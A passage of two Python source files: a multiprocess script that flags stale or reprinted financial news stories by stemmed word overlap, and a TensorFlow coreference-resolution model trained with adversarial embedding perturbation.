return etree.find("djnml").find("head").find("docdata").find("djn").find("djn-newswires").find("djn-mdata").attrib['display-date']
def stem(tokenizedWords):
"""
returns a set of stemed words.
"""
r = set()
for word in tokenizedWords:
if word in wordDict:
add = wordDict[word]
else:
add = stemmer.stem(word)
wordDict[word] = add
r.add(add)
return r
def stop(tokenizedWords):
"""
returns a set with stop words removed.
"""
filtered = set()
for word in tokenizedWords:
if word not in stop_words:
filtered.add(word)
return filtered
def similaritytest(orig, others):
"""
returns a similarity score between stemmed article orig
and a listed of stemmed articles.
"""
B = set.union(*[story.textWords for story in others])
A = orig.textWords.intersection(B)
return len(A) / len(orig.textWords)
def stale(origStory, neighborStories, simtest):
'''
Determines the staleness of news given origStory and neighborStories.
'''
r = [False, False, False, 0]
if (len(neighborStories) == 0):
return r
else:
others = [story_tuple[1] for story_tuple in neighborStories]
stale_score = simtest(origStory, others)
stale_max = neighborStories[0][0]
r[3] = stale_score
if (stale_score >= 0.6):
r[0] = True
if (stale_max >= 0.8):
r[1] = True
else:
r[2] = True
return r
def staleNewsProcedure(ticker, story, companies, simtest):
'''
Performs the stalen news procedure for one article. Returns the similarity
information for this article compared to the articles up to 72 hours prior.
'''
companyLL = companies[ticker]
companyLL.resetCurr()
compStory = companyLL.nextNode()
maxpq = []
while (compStory != None):
if story.displayDate - compStory.displayDate > 259200:
companyLL.cut();
break;
sim = simtest(story, [compStory])
heapq.heappush(maxpq, (sim, compStory))
compStory = companyLL.nextNode()
largestFive = heapq.nlargest(5, maxpq)
old_reprint_recomb = stale(story, largestFive, simtest)
companies[ticker].addFront(story)
if (largestFive != []):
largestacc = largestFive[0][1].accessionNumber
largestsim = largestFive[0][0]
else:
largestacc = None
largestsim = None
if (len(largestFive) > 1):
secondlargestacc = largestFive[1][1].accessionNumber
else:
secondlargestacc = None
return [story.displayDate, story.accessionNumber, ticker, len(story.textWords), largestacc, secondlargestacc, largestsim, old_reprint_recomb[3], old_reprint_recomb[0], old_reprint_recomb[1], old_reprint_recomb[2]]
class Story:
'''A story class. Contains all of the information useful from each story.'''
accessionNumber = 0
displayDate = 0
tickers = []
headline = ""
text = "";
textWords = set()
sim = -1
def __init__(self, et=None):
self.accessionNumber = accessionNum(et)
self.displayDate = dateutil.parser.parse(displayDate(et)).timestamp()
self.tickers = tickercreator(et)
self.text = article(et)
self.textWords = stop(stem(word_tokenize(article(et))))
self.headline = headline(et)
def from_other(self, number, date, tick, txt, s):
self.acessionNumber = number
self.displayDate = date
self.tickers = tick
self.text = txt
self.sim = s
def __lt__ (self, other):
if (type(other) == int):
return self.sim < other
return self.sim < other.sim
class myLinkedList:
'''
A linked list. One key property of this LL is that the next node can be
called with nextNode.If cut is called, the LL will be pruned (or cut) at
the location of nextNode, so that unnecessary information can be easily
removed.
'''
head = None
end = None
curr = None
def __init__(self):
self.head = LLNode("sentinel")
self.end = self.head
def addFront(self, val):
self.head.nextNode = LLNode(val, self.head.nextNode)
def resetCurr(self):
self.curr = self.head
def nextNode(self):
self.curr = self.curr.nextNode
if (self.curr == None):
return None
t = self.curr.val
return t
def cut(self):
self.curr.nextNode = None
class LLNode():
val = None;
nextNode = None;
def __init__(self, val=None, nextNode=None):
self.val = val
self.nextNode = nextNode
def processor(q, simtest, temp_save):
"""
Worker that will process a que of stories.
"""
with open(temp_save, 'w', newline='') as csvfile:
writer = csv.writer(csvfile, delimiter=',')
writer.writerow(['DATE_EST', 'STORY_ID', 'TICKER', 'STORY_LENGTH', 'CLOSEST_ID', 'SECOND_CLOSEST_ID', 'CLOSEST_SCORE', 'TOTAL_OVERLAP', 'IS_OLD', 'IS_REPRINT', 'IS_RECOMB'])
companies = dict()
while True:
story, ticker = q.get(block=True)
if ticker == "ad mortem":
break
if ticker not in companies:
companies[ticker] = myLinkedList()
p = staleNewsProcedure(ticker, story, companies, simtest)
writer.writerow(p)
def supplier(pipe, Story):
"""
Worker that cleanes stories.
"""
while True:
et = pipe.recv()
if et == "ad mortem":
break
else:
pipe.send(Story(et))
def merge(endlocation, temp_files):
"""
Merges together sorted files into one laregr file. Deletes the temo_files
after the megre.
"""
files = [open(file, 'r') for file in temp_files]
filedata = {i: csv.reader(file, delimiter=',') for i, file in enumerate(files)}
temp = list()
for i in range(len(temp_files)):
next(filedata[i])
newline = next(filedata[i])
heapq.heappush(temp, (newline[0], i, newline))
with open(endlocation, 'w', newline='') as csvfile:
writer = csv.writer(csvfile, delimiter=',')
writer.writerow(['DATE_EST', 'STORY_ID', 'TICKER', 'STORY_LENGTH', 'CLOSEST_ID', 'SECOND_CLOSEST_ID', 'CLOSEST_SCORE', 'TOTAL_OVERLAP', 'IS_OLD', 'IS_REPRINT', 'IS_RECOMB'])
while temp:
_, f, data = heapq.heappop(temp)
writer.writerow(data)
try:
newline = next(filedata[f])
except StopIteration:
newline = None
if newline:
heapq.heappush(temp, (newline[0], f, newline))
[file.close() for file in files]
[os.remove(file) for file in temp_files]
def worker_init(count, t, simtest=None):
"""
starts up the worker processes.
"""
workers, worker_processes = list(), list()
for i in range(count):
if t == "supplier":
a, b = Pipe()
worker = Process(target=supplier, args=((b), (Story)))
worker.start()
workers.append(a)
worker_processes.append(worker)
elif t == "processor":
temp_save = f"temp_file_{i}.csv"
queue = Queue()
worker = Process(target=processor, args=((queue), (simtest), (temp_save)))
worker_processes.append(worker)
worker.start()
workers.append(queue)
return workers, worker_processes
def procedure(startlocation = 'data', endlocation='export_dataframe.csv', simtest=similaritytest, worker_count=-1):
'''
Performs the procedure for the specified amount of articles. Uses
all nml files from startlocation, and exports a csv file at endlocation.
'''
if worker_count < 0:
worker_count += cpu_count() + 1
worker_count = worker_count * 2
location = sorted(glob.glob(startlocation + '/*.nml'))
companies = dict()
suppliers, supplier_processes = worker_init(worker_count, "supplier")
processors, processor_processes = worker_init(worker_count, "processor", simtest)
for f in location:
print("File processing...",f)
xtg = xmlTreeGetter(f)
for supplier in suppliers:
try:
et = next(xtg)
except:
continue
supplier.send(et)
checks, load = 0, 0
while checks < len(suppliers):
for supplier in suppliers:
if checks >= len(suppliers):
break
story = supplier.recv()
try:
et = next(xtg)
supplier.send(et)
except:
checks += 1
if not (story.tickers == []):
for ticker in story.tickers:
if '.' in ticker:
continue
if ticker not in companies:
companies[ticker] = load
load = (load + 1) % worker_count
processors[companies[ticker]].put((story, ticker))
[a.send("ad mortem") for a in suppliers]
[w.join() for w in supplier_processes]
[q.put((None, "ad mortem")) for q in processors]
[w.join() for w in processor_processes]
merge(endlocation, [f"temp_file_{i}.csv" for i in range(worker_count)])
print('Procedure finished')
if __name__ == '__main__':
start = time.time()
if len(sys.argv) == 3:
procedure(sys.argv[1], sys.argv[2])
print(time.time() - start)
else:
print(time.time() - start)
sys.exit(1) |
coref_model_ad.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# -*-encoding:utf-8-*-
import os
import operator
import random
import math
import json
import threading
import numpy as np
import tensorflow as tf
import tensorflow_hub as hub
import h5py
import util
import coref_ops
import conll
import metrics
import tools
import re
NUM = re.compile(r'\d{4}')
class CorefModel(object):
def __init__(self, config):
self.config = config
self.context_embeddings = util.EmbeddingDictionary(config["context_embeddings"])
self.head_embeddings = util.EmbeddingDictionary(config["head_embeddings"], maybe_cache=self.context_embeddings)
self.char_embedding_size = config["char_embedding_size"]
self.char_dict = util.load_char_dict(config["char_vocab_path"])
self.max_span_width = config["max_span_width"]
self.genres = {g: i for i, g in enumerate(config["genres"])}
if config["lm_path"]:
self.lm_file = h5py.File(self.config["lm_path"], "r")
else:
self.lm_file = None
self.lm_layers = self.config["lm_layers"]
self.lm_size = self.config["lm_size"]
self.eval_data = None # Load eval data lazily.
input_props = []
input_props.append((tf.string, [None, None])) # Tokens.
input_props.append((tf.float32, [None, None, self.context_embeddings.size])) # Context embeddings.
input_props.append((tf.float32, [None, None, self.head_embeddings.size])) # Head embeddings.
input_props.append((tf.float32, [None, None, self.lm_size, self.lm_layers])) # LM embeddings.
input_props.append((tf.int32, [None, None, None])) # Character indices.
input_props.append((tf.int32, [None])) # Text lengths.
input_props.append((tf.int32, [None])) # Speaker IDs.
input_props.append((tf.int32, [])) # Genre.
input_props.append((tf.bool, [])) # Is training.
input_props.append((tf.int32, [None])) # Gold starts.
input_props.append((tf.int32, [None])) # Gold ends.
input_props.append((tf.int32, [None])) # Cluster ids.
input_props.append((tf.int32, [None])) # sentence_start.
input_props.append((tf.int32, [None])) # sentence_end.
self.queue_input_tensors = [tf.placeholder(dtype, shape) for dtype, shape in input_props]
dtypes, shapes = zip(*input_props)
queue = tf.PaddingFIFOQueue(capacity=10, dtypes=dtypes, shapes=shapes)
self.enqueue_op = queue.enqueue(self.queue_input_tensors)
self.input_tensors = queue.dequeue()
self.predictions, self.loss, self.top_list = self.get_predictions_and_loss(*self.input_tensors)
"""adversarial train, used FGM"""
self.top_embed, top_ids, top_scores, top_speaker, genre_emb_r, k_r = self.top_list
self.copy_top_embed = tf.identity(self.top_embed)
with tf.name_scope('ad') as scope:
self.ad_loss = self.adversarial_loss(self.copy_top_embed, top_ids, top_scores, top_speaker, genre_emb_r, k_r)
gradients_r = tf.gradients(self.ad_loss, self.copy_top_embed, aggregation_method=tf.AggregationMethod.EXPERIMENTAL_ACCUMULATE_N)
gradients_r = tf.stop_gradient(gradients_r)
norm = tf.norm(gradients_r)
r = gradients_r / norm
self.copy_top_embed = self.copy_top_embed + r
self.global_step = tf.Variable(0, name="global_step", trainable=False)
self.reset_global_step = tf.assign(self.global_step, 0)
learning_rate = tf.train.exponential_decay(self.config["learning_rate"], self.global_step,
self.config["decay_frequency"], self.config["decay_rate"],
staircase=True)
trainable_params = tf.trainable_variables()
gradients = tf.gradients(self.loss * 0.6 + self.ad_loss * 0.4, trainable_params)
gradients, _ = tf.clip_by_global_norm(gradients, self.config["max_gradient_norm"])
optimizers = {
"adam": tf.train.AdamOptimizer,
"sgd": tf.train.GradientDescentOptimizer
}
optimizer = optimizers[self.config["optimizer"]](learning_rate)
self.train_op = optimizer.apply_gradients(zip(gradients, trainable_params), global_step=self.global_step)
def start_enqueue_thread(self, session):
with open(self.config["train_path"]) as f:
train_examples = [json.loads(jsonline) for jsonline in f.readlines()]
def _enqueue_loop():
while True:
random.shuffle(train_examples)
for example in train_examples:
tensorized_example = self.tensorize_example(example, is_training=True)
feed_dict = dict(zip(self.queue_input_tensors, tensorized_example))
session.run(self.enqueue_op, feed_dict=feed_dict)
enqueue_thread = threading.Thread(target=_enqueue_loop)
enqueue_thread.daemon = True
enqueue_thread.start()
def restore(self, session):
# Don't try to restore unused variables from the TF-Hub ELMo module.
vars_to_restore = [v for v in tf.global_variables() if "module/" not in v.name]
saver = tf.train.Saver(vars_to_restore)
# checkpoint_path = os.path.join(self.config["log_dir"], "model.max.ckpt")
checkpoint_path = os.path.join(self.config["log_dir"], "model-4500")
print("Restoring from {}".format(checkpoint_path))
session.run(tf.global_variables_initializer())
saver.restore(session, checkpoint_path)
def load_lm_embeddings(self, doc_key):
if self.lm_file is None:
return np.zeros([0, 0, self.lm_size, self.lm_layers])
file_key = doc_key.replace("/", ":")
group = self.lm_file[file_key]
num_sentences = len(list(group.keys()))
sentences = [group[str(i)][...] for i in range(num_sentences)]
lm_emb = np.zeros([num_sentences, max(s.shape[0] for s in sentences), self.lm_size, self.lm_layers])
for i, s in enumerate(sentences):
lm_emb[i, :s.shape[0], :, :] = s
return lm_emb
def sentence_start_end_index(self, sentences):
"""
:param sentences: sentences list example: [['i', 'like'], ['cat']]
:return: sentences start list and end list just like start:[0, 2], end:[1, 2]
"""
start_l, end_l = [], []
offset = -1
for sentence in sentences:
start_ = offset + 1
end_ = len(sentence) + offset
try:
if sentence[0] == '[' and NUM.match(sentence[1]) and sentence[2] == ']':
start_ = start_ + 3
finally:
offset = offset + len(sentence)
if abs(end_ - start_ + 1) > 30:
start_l.append(start_)
end_l.append(end_)
assert len(start_l) == len(end_l)
return np.array(start_l), np.array(end_l)
def tensorize_mentions(self, mentions):
if len(mentions) > 0:
starts, ends = zip(*mentions)
else:
starts, ends = [], []
return np.array(starts), np.array(ends)
def tensorize_span_labels(self, tuples, label_dict):
if len(tuples) > 0:
starts, ends, labels = zip(*tuples)
else:
starts, ends, labels = [], [], []
return np.array(starts), np.array(ends), np.array([label_dict[c] for c in labels])
def tensorize_example(self, example, is_training):
clusters = example["clusters"]
gold_mentions = sorted(tuple(m) for m in util.flatten(clusters))
# print('gold_mentions', gold_mentions)
gold_mention_map = {m: i for i, m in enumerate(gold_mentions)}
# print('gold_mention_map', gold_mention_map)
cluster_ids = np.zeros(len(gold_mentions))
# print(cluster_ids)
for cluster_id, cluster in enumerate(clusters):
for mention in cluster:
cluster_ids[gold_mention_map[tuple(mention)]] = cluster_id + 1
# print('cluster_ids', cluster_ids)
sentences = example["sentences"]
num_words = sum(len(s) for s in sentences)
speakers = util.flatten(example["speakers"])
assert num_words == len(speakers)
max_sentence_length = max(len(s) for s in sentences)
max_word_length = max(max(max(len(w) for w in s) for s in sentences), max(self.config["filter_widths"]))
text_len = np.array([len(s) for s in sentences])
tokens = [[""] * max_sentence_length for _ in sentences]
context_word_emb = np.zeros([len(sentences), max_sentence_length, self.context_embeddings.size])
# print('context_word_emb', context_word_emb, context_word_emb.shape)
head_word_emb = np.zeros([len(sentences), max_sentence_length, self.head_embeddings.size])
# print('head_word_emb', head_word_emb, head_word_emb.shape)
char_index = np.zeros([len(sentences), max_sentence_length, max_word_length])
# print('char_index', char_index, char_index.shape)
for i, sentence in enumerate(sentences):
for j, word in enumerate(sentence):
tokens[i][j] = word
context_word_emb[i, j] = self.context_embeddings[word]
head_word_emb[i, j] = self.head_embeddings[word]
char_index[i, j, :len(word)] = [self.char_dict[c] for c in word]
tokens = np.array(tokens)
# print('context_word_emb', context_word_emb)
speaker_dict = {s: i for i, s in enumerate(set(speakers))}
speaker_ids = np.array([speaker_dict[s] for s in speakers])
doc_key = example["doc_key"]
genre = self.genres[doc_key[:2]]
gold_starts, gold_ends = self.tensorize_mentions(gold_mentions)
sentence_index_start, sentence_index_end = self.sentence_start_end_index(sentences)
lm_emb = self.load_lm_embeddings(doc_key)
# example_tensors = (tokens, context_word_emb, head_word_emb, lm_emb, char_index, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids)
example_tensors = (tokens, context_word_emb, head_word_emb, lm_emb, char_index, text_len, speaker_ids, genre, is_training,
gold_starts, gold_ends, cluster_ids, sentence_index_start, sentence_index_end)
if is_training and len(sentences) > self.config["max_training_sentences"]:
return self.truncate_example(*example_tensors)
else:
return example_tensors
def truncate_example(self, tokens, context_word_emb, head_word_emb, lm_emb, char_index, text_len, speaker_ids,
genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_index_start,
sentence_index_end):
max_training_sentences = self.config["max_training_sentences"]
num_sentences = context_word_emb.shape[0]
assert num_sentences > max_training_sentences
sentence_offset = random.randint(0, num_sentences - max_training_sentences)
word_offset = text_len[:sentence_offset].sum()
num_words = text_len[sentence_offset:sentence_offset + max_training_sentences].sum()
tokens = tokens[sentence_offset:sentence_offset + max_training_sentences, :]
context_word_emb = context_word_emb[sentence_offset:sentence_offset + max_training_sentences, :, :]
head_word_emb = head_word_emb[sentence_offset:sentence_offset + max_training_sentences, :, :]
lm_emb = lm_emb[sentence_offset:sentence_offset + max_training_sentences, :, :, :]
char_index = char_index[sentence_offset:sentence_offset + max_training_sentences, :, :]
text_len = text_len[sentence_offset:sentence_offset + max_training_sentences]
speaker_ids = speaker_ids[word_offset: word_offset + num_words]
gold_spans = np.logical_and(gold_ends >= word_offset, gold_starts < word_offset + num_words)
gold_starts = gold_starts[gold_spans] - word_offset
gold_ends = gold_ends[gold_spans] - word_offset
"""i want to get sentence start and end index
"""
sentence_spans = np.logical_and(sentence_index_end >= word_offset,
sentence_index_start < word_offset + num_words)
sentence_index_start = sentence_index_start[sentence_spans] - word_offset
sentence_index_end = sentence_index_end[sentence_spans] - word_offset
cluster_ids = cluster_ids[gold_spans]
return tokens, context_word_emb, head_word_emb, lm_emb, char_index, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_index_start, sentence_index_end
def get_candidate_labels(self, candidate_starts, candidate_ends, labeled_starts, labeled_ends, labels):
same_start = tf.equal(tf.expand_dims(labeled_starts, 1),
tf.expand_dims(candidate_starts, 0)) # [num_labeled, num_candidates]
same_end = tf.equal(tf.expand_dims(labeled_ends, 1),
tf.expand_dims(candidate_ends, 0)) # [num_labeled, num_candidates]
same_span = tf.logical_and(same_start, same_end) # [num_labeled, num_candidates]
candidate_labels = tf.matmul(tf.expand_dims(labels, 0), tf.to_int32(same_span)) # [1, num_candidates]
candidate_labels = tf.squeeze(candidate_labels, 0) # [num_candidates]
return candidate_labels
def get_dropout(self, dropout_rate, is_training):
return 1 - (tf.to_float(is_training) * dropout_rate)
def coarse_to_fine_pruning(self, top_span_emb, top_span_mention_scores, c):
k = util.shape(top_span_emb, 0)
top_span_range = tf.range(k) # [k]
antecedent_offsets = tf.expand_dims(top_span_range, 1) - tf.expand_dims(top_span_range, 0) # [k, k]
antecedents_mask = antecedent_offsets >= 1 # [k, k]
fast_antecedent_scores = tf.expand_dims(top_span_mention_scores, 1) + tf.expand_dims(top_span_mention_scores,
0) # [k, k]
fast_antecedent_scores += tf.log(tf.to_float(antecedents_mask)) # [k, k]
fast_antecedent_scores += self.get_fast_antecedent_scores(top_span_emb) # [k, k]
_, top_antecedents = tf.nn.top_k(fast_antecedent_scores, c, sorted=False) # [k, c]
top_antecedents_mask = util.batch_gather(antecedents_mask, top_antecedents) # [k, c]
top_fast_antecedent_scores = util.batch_gather(fast_antecedent_scores, top_antecedents) # [k, c]
top_antecedent_offsets = util.batch_gather(antecedent_offsets, top_antecedents) # [k, c]
return top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets
def distance_pruning(self, top_span_emb, top_span_mention_scores, c):
k = util.shape(top_span_emb, 0)
top_antecedent_offsets = tf.tile(tf.expand_dims(tf.range(c) + 1, 0), [k, 1]) # [k, c]
raw_top_antecedents = tf.expand_dims(tf.range(k), 1) - top_antecedent_offsets # [k, c]
top_antecedents_mask = raw_top_antecedents >= 0 # [k, c]
top_antecedents = tf.maximum(raw_top_antecedents, 0) # [k, c]
top_fast_antecedent_scores = tf.expand_dims(top_span_mention_scores, 1) + tf.gather(top_span_mention_scores,
top_antecedents) # [k, c]
top_fast_antecedent_scores += tf.log(tf.to_float(top_antecedents_mask)) # [k, c]
return top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets
def get_predictions_and_loss(self, tokens, context_word_emb, head_word_emb, lm_emb, char_index, text_len,
speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids,
sentence_index_start, sentence_index_end):
self.dropout = self.get_dropout(self.config["dropout_rate"], is_training)
self.lexical_dropout = self.get_dropout(self.config["lexical_dropout_rate"], is_training)
self.lstm_dropout = self.get_dropout(self.config["lstm_dropout_rate"], is_training)
num_sentences = tf.shape(context_word_emb)[0]
max_sentence_length = tf.shape(context_word_emb)[1]
context_emb_list = [context_word_emb]
head_emb_list = [head_word_emb]
if self.config["char_embedding_size"] > 0:
char_emb = tf.gather(
tf.get_variable("char_embeddings", [len(self.char_dict), self.config["char_embedding_size"]]),
char_index) # [num_sentences, max_sentence_length, max_word_length, emb]
flattened_char_emb = tf.reshape(char_emb, [num_sentences * max_sentence_length, util.shape(char_emb, 2),
util.shape(char_emb,
3)]) # [num_sentences * max_sentence_length, max_word_length, emb]
flattened_aggregated_char_emb = util.cnn(flattened_char_emb, self.config["filter_widths"], self.config[
"filter_size"]) # [num_sentences * max_sentence_length, emb]
aggregated_char_emb = tf.reshape(flattened_aggregated_char_emb, [num_sentences, max_sentence_length,
util.shape(flattened_aggregated_char_emb,
1)]) # [num_sentences, max_sentence_length, emb]
context_emb_list.append(aggregated_char_emb)
head_emb_list.append(aggregated_char_emb)
if not self.lm_file:
elmo_module = hub.Module("https://tfhub.dev/google/elmo/2")
lm_embeddings = elmo_module(
inputs={"tokens": tokens, "sequence_len": text_len},
signature="tokens", as_dict=True)
word_emb = lm_embeddings["word_emb"] # [num_sentences, max_sentence_length, 512]
lm_emb = tf.stack([tf.concat([word_emb, word_emb], -1),
lm_embeddings["lstm_outputs1"],
lm_embeddings["lstm_outputs2"]], -1) # [num_sentences, max_sentence_length, 1024, 3]
lm_emb_size = util.shape(lm_emb, 2)
lm_num_layers = util.shape(lm_emb, 3)
with tf.variable_scope("lm_aggregation"):
self.lm_weights = tf.nn.softmax(
tf.get_variable("lm_scores", [lm_num_layers], initializer=tf.constant_initializer(0.0)))
self.lm_scaling = tf.get_variable("lm_scaling", [], initializer=tf.constant_initializer(1.0))
flattened_lm_emb = tf.reshape(lm_emb, [num_sentences * max_sentence_length * lm_emb_size, lm_num_layers])
flattened_aggregated_lm_emb = tf.matmul(flattened_lm_emb, tf.expand_dims(self.lm_weights,
1)) # [num_sentences * max_sentence_length * emb, 1]
aggregated_lm_emb = tf.reshape(flattened_aggregated_lm_emb, [num_sentences, max_sentence_length, lm_emb_size])
aggregated_lm_emb *= self.lm_scaling
context_emb_list.append(aggregated_lm_emb)
context_emb = tf.concat(context_emb_list, 2) # [num_sentences, max_sentence_length, emb]
head_emb = tf.concat(head_emb_list, 2) # [num_sentences, max_sentence_length, emb]
context_emb = tf.nn.dropout(context_emb, self.lexical_dropout) # [num_sentences, max_sentence_length, emb]
head_emb = tf.nn.dropout(head_emb, self.lexical_dropout) # [num_sentences, max_sentence_length, emb]
""" get context embedding with glove 300 and 50, the 300 dimension embedding use to concatenate char embedding and other
feature embedding. And the 50 dimension embedding with glove_300d_2w use to compute attention. They are encoding with
context.
1. context whole embedding equal language model elmo get token embedding(aggregated_lm_emb) concatenate char embedding
concatenate glove(300 dimension word2vec embedding).
shape: [num_sentences, max_sentence_length, emb]
2. head_emb equal glove(50 dimension word2vec embedding concatenate char embedding)
shape: [num_sentences, max_sentence_length, emb]
"""
text_len_mask = tf.sequence_mask(text_len, maxlen=max_sentence_length) # [num_sentence, max_sentence_length]
context_outputs = self.lstm_contextualize(context_emb, text_len, text_len_mask) # [num_words, emb]
"""Used context lstm encoder
input: context whole embedding
output: context_output
shape: [num_sentences * max_sentence_length, emb]
"""
num_words = util.shape(context_outputs, 0)
genre_emb = tf.gather(tf.get_variable("genre_embeddings", [len(self.genres), self.config["feature_size"]]),
genre) # [emb]
sentence_indices = tf.tile(tf.expand_dims(tf.range(num_sentences), 1),
[1, max_sentence_length]) # [num_sentences, max_sentence_length]
flattened_sentence_indices = self.flatten_emb_by_sentence(sentence_indices, text_len_mask) # [num_words]
flattened_head_emb = self.flatten_emb_by_sentence(head_emb, text_len_mask) # [num_words]
candidate_starts = tf.tile(tf.expand_dims(tf.range(num_words), 1),
[1, self.max_span_width]) # [num_words, max_span_width]
candidate_ends = candidate_starts + tf.expand_dims(tf.range(self.max_span_width),
0) # [num_words, max_span_width]
""" add sentence candidate starts and candidate ends in this place. and padding max_span_width to max_sentence_len.
sentence_indices not used in this model input
"""
# print('candidate_starts_1', candidate_starts)
candidate_start_sentence_indices = tf.gather(flattened_sentence_indices,
candidate_starts) # [num_words, max_span_width]
candidate_end_sentence_indices = tf.gather(flattened_sentence_indices, tf.minimum(candidate_ends,
num_words - 1)) # [num_words, max_span_width]
candidate_mask = tf.logical_and(candidate_ends < num_words, tf.equal(candidate_start_sentence_indices,
candidate_end_sentence_indices)) # [num_words, max_span_width]
flattened_candidate_mask = tf.reshape(candidate_mask, [-1]) # [num_words * max_span_width]
candidate_starts = tf.boolean_mask(tf.reshape(candidate_starts, [-1]),
flattened_candidate_mask) # [num_candidates]
candidate_ends = tf.boolean_mask(tf.reshape(candidate_ends, [-1]), flattened_candidate_mask) # [num_candidates]
candidate_sentence_indices = tf.boolean_mask(tf.reshape(candidate_start_sentence_indices, [-1]),
flattened_candidate_mask) # [num_candidates]
"""this is my change in input queue, add sentence_index start and end in candidate. we want to add sentence level
span candidate.
"""
candidate_starts = tf.concat([candidate_starts, sentence_index_start], axis=0)
candidate_ends = tf.concat([candidate_ends, sentence_index_end], axis=0)
"""think of use padding to change the span embedding dimention in this place.
candidate_cluster_ids compare between candidate and gold mention,example second
candidate is true, candidate_cluster_ids just like: [0, 1, 0]
"""
candidate_cluster_ids = self.get_candidate_labels(candidate_starts, candidate_ends, gold_starts, gold_ends,
cluster_ids) # [num_candidates]
candidate_span_emb = self.get_span_emb(flattened_head_emb, context_outputs, candidate_starts,
candidate_ends) # [num_candidates, emb]
candidate_mention_scores = self.get_mention_scores(candidate_span_emb) # [k, 1]
candidate_mention_scores = tf.squeeze(candidate_mention_scores, 1) # [k]
k = tf.to_int32(tf.floor(tf.to_float(tf.shape(context_outputs)[0]) * self.config["top_span_ratio"]))
top_span_indices = coref_ops.extract_spans(tf.expand_dims(candidate_mention_scores, 0),
tf.expand_dims(candidate_starts, 0),
tf.expand_dims(candidate_ends, 0),
tf.expand_dims(k, 0),
util.shape(context_outputs, 0),
True) # [1, k]
top_span_indices.set_shape([1, None])
top_span_indices = tf.squeeze(top_span_indices, 0) # [k]
top_span_starts = tf.gather(candidate_starts, top_span_indices) # [k]
top_span_ends = tf.gather(candidate_ends, top_span_indices) # [k]
top_span_emb = tf.gather(candidate_span_emb, top_span_indices) # [k, emb]
top_span_cluster_ids = tf.gather(candidate_cluster_ids, top_span_indices) # [k]
top_span_mention_scores = tf.gather(candidate_mention_scores, top_span_indices) # [k]
top_span_sentence_indices = tf.gather(candidate_sentence_indices, top_span_indices) # [k]
top_span_speaker_ids = tf.gather(speaker_ids, top_span_starts) # [k]
c = tf.minimum(self.config["max_top_antecedents"], k)
"""Stage 1 competed: k candidate mentions.
"""
if self.config["coarse_to_fine"]:
top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets = self.coarse_to_fine_pruning(
top_span_emb, top_span_mention_scores, c)
else:
top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets = self.distance_pruning(
top_span_emb, top_span_mention_scores, c)
"""Stage 2 competed: get each of k mensions c antecedents
shape: [k, c]
"""
dummy_scores = tf.zeros([k, 1]) # [k, 1]
for i in range(self.config["coref_depth"]):
with tf.variable_scope("coref_layer", reuse=(i > 0)):
top_antecedent_emb = tf.gather(top_span_emb, top_antecedents) # [k, c, emb]
top_antecedent_scores = top_fast_antecedent_scores + self.get_slow_antecedent_scores(top_span_emb,
top_antecedents,
top_antecedent_emb,
top_antecedent_offsets,
top_span_speaker_ids,
genre_emb) # [k, c]
top_antecedent_weights = tf.nn.softmax(
tf.concat([dummy_scores, top_antecedent_scores], 1)) # [k, c + 1]
top_antecedent_emb = tf.concat([tf.expand_dims(top_span_emb, 1), top_antecedent_emb],
1) # [k, c + 1, emb]
attended_span_emb = tf.reduce_sum(tf.expand_dims(top_antecedent_weights, 2) * top_antecedent_emb,
1) # [k, emb]
with tf.variable_scope("f"):
f = tf.sigmoid(util.projection(tf.concat([top_span_emb, attended_span_emb], 1),
util.shape(top_span_emb, -1))) # [k, emb]
top_span_emb = f * attended_span_emb + (1 - f) * top_span_emb # [k, emb]
"""Stage 3 used original paper section 3 function: the antecedent and top_span composed a pairs (coref entity, demonstraction
pronoun) and computer the pair of score s(gi, gj), s(gi, gj) = top_fast_antecedent_scores + get_slow_antecdents, via softmax,
get the weights of each k span's (c + 1) antecedents weight. P(yi), yi is i mention in top_span. This is a attention mechanism
get a new embedding ai, ai are calculate by attention mechanism. And then concatenate ai and gi. matmul W and via sigmoid to
get a gatekeeper(fi). Finally, gi_final = fi * gi + (1 - fi) * ai.
shape: [k, emb]
"""
top_antecedent_scores = tf.concat([dummy_scores, top_antecedent_scores], 1) # [k, c + 1]
top_antecedent_cluster_ids = tf.gather(top_span_cluster_ids, top_antecedents) # [k, c]
top_antecedent_cluster_ids += tf.to_int32(tf.log(tf.to_float(top_antecedents_mask))) # [k, c]
same_cluster_indicator = tf.equal(top_antecedent_cluster_ids, tf.expand_dims(top_span_cluster_ids, 1)) # [k, c]
non_dummy_indicator = tf.expand_dims(top_span_cluster_ids > 0, 1) # [k, 1]
pairwise_labels = tf.logical_and(same_cluster_indicator, non_dummy_indicator) # [k, c]
dummy_labels = tf.logical_not(tf.reduce_any(pairwise_labels, 1, keepdims=True)) # [k, 1]
top_antecedent_labels = tf.concat([dummy_labels, pairwise_labels], 1) # [k, c + 1]
# print('top_antecedent_scores', top_antecedent_scores, top_antecedent_scores.shape)
# print('top_antecedent_labels', top_antecedent_labels, top_antecedent_labels.shape)
loss = self.softmax_loss(top_antecedent_scores, top_antecedent_labels) # [k]
"""result of k antecedents's softmax loss.
shape: [k]
"""
loss = tf.reduce_sum(loss) # []
return [candidate_span_emb, candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends,
top_antecedents, top_antecedent_scores], loss, [top_span_emb, top_span_cluster_ids, top_span_mention_scores, top_span_speaker_ids,
genre_emb, k]
def adversarial_loss(self, top_span_emb, top_span_cluster_ids, top_span_mention_scores, top_span_speaker_ids, genre_emb, k):
c = tf.minimum(self.config["max_top_antecedents"], k)
"""Stage 1 competed: k candidate mentions.
"""
if self.config["coarse_to_fine"]:
top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets = self.coarse_to_fine_pruning(
top_span_emb, top_span_mention_scores, c)
else:
top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets = self.distance_pruning(
top_span_emb, top_span_mention_scores, c)
"""Stage 2 competed: get each of k mensions c antecedents
shape: [k, c]
"""
dummy_scores = tf.zeros([k, 1]) # [k, 1]
for i in range(self.config["coref_depth"]):
